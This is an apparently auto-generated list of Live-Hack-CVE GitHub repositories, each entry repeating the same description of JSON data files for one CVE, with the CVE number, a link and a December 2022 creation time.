**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38983 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38983](https://github.com/Live-Hack-CVE/CVE-2022-38983) create time: 2022-12-24T13:13:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39065 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39065](https://github.com/Live-Hack-CVE/CVE-2022-39065) create time: 2022-12-24T13:12:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41580 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41580](https://github.com/Live-Hack-CVE/CVE-2022-41580) create time: 2022-12-24T13:12:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41578 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41578](https://github.com/Live-Hack-CVE/CVE-2022-41578) create time: 2022-12-24T13:12:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23267 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23267](https://github.com/Live-Hack-CVE/CVE-2022-23267) create time: 2022-12-24T13:12:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26788 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26788](https://github.com/Live-Hack-CVE/CVE-2022-26788) create time: 2022-12-24T13:12:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38984 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38984](https://github.com/Live-Hack-CVE/CVE-2022-38984) create time: 2022-12-24T13:11:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38985 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38985](https://github.com/Live-Hack-CVE/CVE-2022-38985) create time: 2022-12-24T13:11:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38977 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38977](https://github.com/Live-Hack-CVE/CVE-2022-38977) create time: 2022-12-24T13:11:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38986 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38986](https://github.com/Live-Hack-CVE/CVE-2022-38986) create time: 2022-12-24T13:11:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38998 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38998](https://github.com/Live-Hack-CVE/CVE-2022-38998) create time: 2022-12-24T13:11:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41589 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41589](https://github.com/Live-Hack-CVE/CVE-2022-41589) create time: 2022-12-24T13:11:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41588 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41588](https://github.com/Live-Hack-CVE/CVE-2022-41588) create time: 2022-12-24T13:11:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41587 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41587](https://github.com/Live-Hack-CVE/CVE-2022-41587) create time: 2022-12-24T13:11:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41586 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41586](https://github.com/Live-Hack-CVE/CVE-2022-41586) create time: 2022-12-24T13:11:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41481 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41481](https://github.com/Live-Hack-CVE/CVE-2022-41481) create time: 2022-12-24T13:11:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41585 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41585](https://github.com/Live-Hack-CVE/CVE-2022-41585) create time: 2022-12-24T13:11:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41584 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41584](https://github.com/Live-Hack-CVE/CVE-2022-41584) create time: 2022-12-24T13:11:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41583 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41583](https://github.com/Live-Hack-CVE/CVE-2022-41583) create time: 2022-12-24T13:11:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41485 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41485](https://github.com/Live-Hack-CVE/CVE-2022-41485) create time: 2022-12-24T13:11:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41482 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41482](https://github.com/Live-Hack-CVE/CVE-2022-41482) create time: 2022-12-24T13:11:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41480 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41480](https://github.com/Live-Hack-CVE/CVE-2022-41480) create time: 2022-12-24T13:11:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41582 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41582](https://github.com/Live-Hack-CVE/CVE-2022-41582) create time: 2022-12-24T13:11:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41581 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41581](https://github.com/Live-Hack-CVE/CVE-2022-41581) create time: 2022-12-24T13:11:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39011 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39011](https://github.com/Live-Hack-CVE/CVE-2022-39011) create time: 2022-12-24T13:10:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38448 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38448](https://github.com/Live-Hack-CVE/CVE-2022-38448) create time: 2022-12-24T13:10:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-1197 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-1197](https://github.com/Live-Hack-CVE/CVE-2015-1197) create time: 2022-12-24T11:43:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-7517 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-7517](https://github.com/Live-Hack-CVE/CVE-2017-7517) create time: 2022-12-24T12:28:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2601 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2601](https://github.com/Live-Hack-CVE/CVE-2017-2601) create time: 2022-12-24T12:23:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-10274 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-10274](https://github.com/Live-Hack-CVE/CVE-2017-10274) create time: 2022-12-24T12:22:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-20149 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-20149](https://github.com/Live-Hack-CVE/CVE-2017-20149) create time: 2022-12-24T11:48:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-6171 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-6171](https://github.com/Live-Hack-CVE/CVE-2019-6171) create time: 2022-12-24T12:29:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20933 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20933](https://github.com/Live-Hack-CVE/CVE-2019-20933) create time: 2022-12-24T12:28:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14841 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14841](https://github.com/Live-Hack-CVE/CVE-2019-14841) create time: 2022-12-24T12:28:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-14840 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-14840](https://github.com/Live-Hack-CVE/CVE-2019-14840) create time: 2022-12-24T12:28:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-15961 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-15961](https://github.com/Live-Hack-CVE/CVE-2019-15961) create time: 2022-12-24T12:23:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6294 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6294](https://github.com/Live-Hack-CVE/CVE-2020-6294) create time: 2022-12-24T12:29:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8744 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8744](https://github.com/Live-Hack-CVE/CVE-2020-8744) create time: 2022-12-24T12:29:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26237 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26237](https://github.com/Live-Hack-CVE/CVE-2020-26237) create time: 2022-12-24T12:29:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7032 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7032](https://github.com/Live-Hack-CVE/CVE-2020-7032) create time: 2022-12-24T12:28:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28941 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28941](https://github.com/Live-Hack-CVE/CVE-2020-28941) create time: 2022-12-24T12:28:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-29370 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-29370](https://github.com/Live-Hack-CVE/CVE-2020-29370) create time: 2022-12-24T12:28:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15436 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15436](https://github.com/Live-Hack-CVE/CVE-2020-15436) create time: 2022-12-24T12:28:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25694 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25694](https://github.com/Live-Hack-CVE/CVE-2020-25694) create time: 2022-12-24T12:28:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25695 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25695](https://github.com/Live-Hack-CVE/CVE-2020-25695) create time: 2022-12-24T12:28:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11208 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11208](https://github.com/Live-Hack-CVE/CVE-2020-11208) create time: 2022-12-24T12:26:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11207 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11207](https://github.com/Live-Hack-CVE/CVE-2020-11207) create time: 2022-12-24T12:26:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-27387 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-27387](https://github.com/Live-Hack-CVE/CVE-2020-27387) create time: 2022-12-24T12:26:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7758 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7758](https://github.com/Live-Hack-CVE/CVE-2020-7758) create time: 2022-12-24T12:25:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11206 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11206](https://github.com/Live-Hack-CVE/CVE-2020-11206) create time: 2022-12-24T12:25:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-28041 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-28041](https://github.com/Live-Hack-CVE/CVE-2020-28041) create time: 2022-12-24T12:25:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1686 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1686](https://github.com/Live-Hack-CVE/CVE-2020-1686) create time: 2022-12-24T12:25:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26867 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26867](https://github.com/Live-Hack-CVE/CVE-2020-26867) create time: 2022-12-24T12:24:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26868 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26868](https://github.com/Live-Hack-CVE/CVE-2020-26868) create time: 2022-12-24T12:24:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-12501 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-12501](https://github.com/Live-Hack-CVE/CVE-2020-12501) create time: 2022-12-24T12:24:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-26247 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-26247](https://github.com/Live-Hack-CVE/CVE-2020-26247) create time: 2022-12-24T12:23:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8973 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8973](https://github.com/Live-Hack-CVE/CVE-2020-8973) create time: 2022-12-24T12:22:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-0569 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-0569](https://github.com/Live-Hack-CVE/CVE-2020-0569) create time: 2022-12-24T12:22:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-0590 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-0590](https://github.com/Live-Hack-CVE/CVE-2020-0590) create time: 2022-12-24T12:22:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15798](https://github.com/Live-Hack-CVE/CVE-2020-15798) create time: 2022-12-24T12:22:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8976 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8976](https://github.com/Live-Hack-CVE/CVE-2020-8976) create time: 2022-12-24T11:47:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-8975 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-8975](https://github.com/Live-Hack-CVE/CVE-2020-8975) create time: 2022-12-24T11:46:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2322 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2322](https://github.com/Live-Hack-CVE/CVE-2020-2322) create time: 2022-12-24T11:44:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-15853 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-15853](https://github.com/Live-Hack-CVE/CVE-2020-15853) create time: 2022-12-24T11:41:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40416 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40416](https://github.com/Live-Hack-CVE/CVE-2021-40416) create time: 2022-12-24T12:31:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-35530 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-35530](https://github.com/Live-Hack-CVE/CVE-2021-35530) create time: 2022-12-24T12:30:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-45809 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-45809](https://github.com/Live-Hack-CVE/CVE-2021-45809) create time: 2022-12-24T12:30:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21235 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21235](https://github.com/Live-Hack-CVE/CVE-2021-21235) create time: 2022-12-24T12:30:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21244 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21244](https://github.com/Live-Hack-CVE/CVE-2021-21244) create time: 2022-12-24T12:30:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21248 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21248](https://github.com/Live-Hack-CVE/CVE-2021-21248) create time: 2022-12-24T12:30:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21263 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21263](https://github.com/Live-Hack-CVE/CVE-2021-21263) create time: 2022-12-24T12:30:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26945 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26945](https://github.com/Live-Hack-CVE/CVE-2021-26945) create time: 2022-12-24T12:29:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21309 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21309](https://github.com/Live-Hack-CVE/CVE-2021-21309) create time: 2022-12-24T12:29:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4157 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4157](https://github.com/Live-Hack-CVE/CVE-2021-4157) create time: 2022-12-24T12:26:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46669 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46669](https://github.com/Live-Hack-CVE/CVE-2021-46669) create time: 2022-12-24T12:26:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39880 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39880](https://github.com/Live-Hack-CVE/CVE-2021-39880) create time: 2022-12-24T12:23:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36833 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36833](https://github.com/Live-Hack-CVE/CVE-2021-36833) create time: 2022-12-24T12:23:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21264 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21264](https://github.com/Live-Hack-CVE/CVE-2021-21264) create time: 2022-12-24T12:23:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-21277 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-21277](https://github.com/Live-Hack-CVE/CVE-2021-21277) create time: 2022-12-24T12:22:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25667 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25667](https://github.com/Live-Hack-CVE/CVE-2021-25667) create time: 2022-12-24T12:22:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40358 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40358](https://github.com/Live-Hack-CVE/CVE-2021-40358) create time: 2022-12-24T12:22:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3305 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3305](https://github.com/Live-Hack-CVE/CVE-2021-3305) create time: 2022-12-24T11:42:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40605 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40605](https://github.com/Live-Hack-CVE/CVE-2022-40605) create time: 2022-12-24T12:32:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41302 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41302](https://github.com/Live-Hack-CVE/CVE-2022-41302) create time: 2022-12-24T12:31:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41303 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41303](https://github.com/Live-Hack-CVE/CVE-2022-41303) create time: 2022-12-24T12:31:47Z

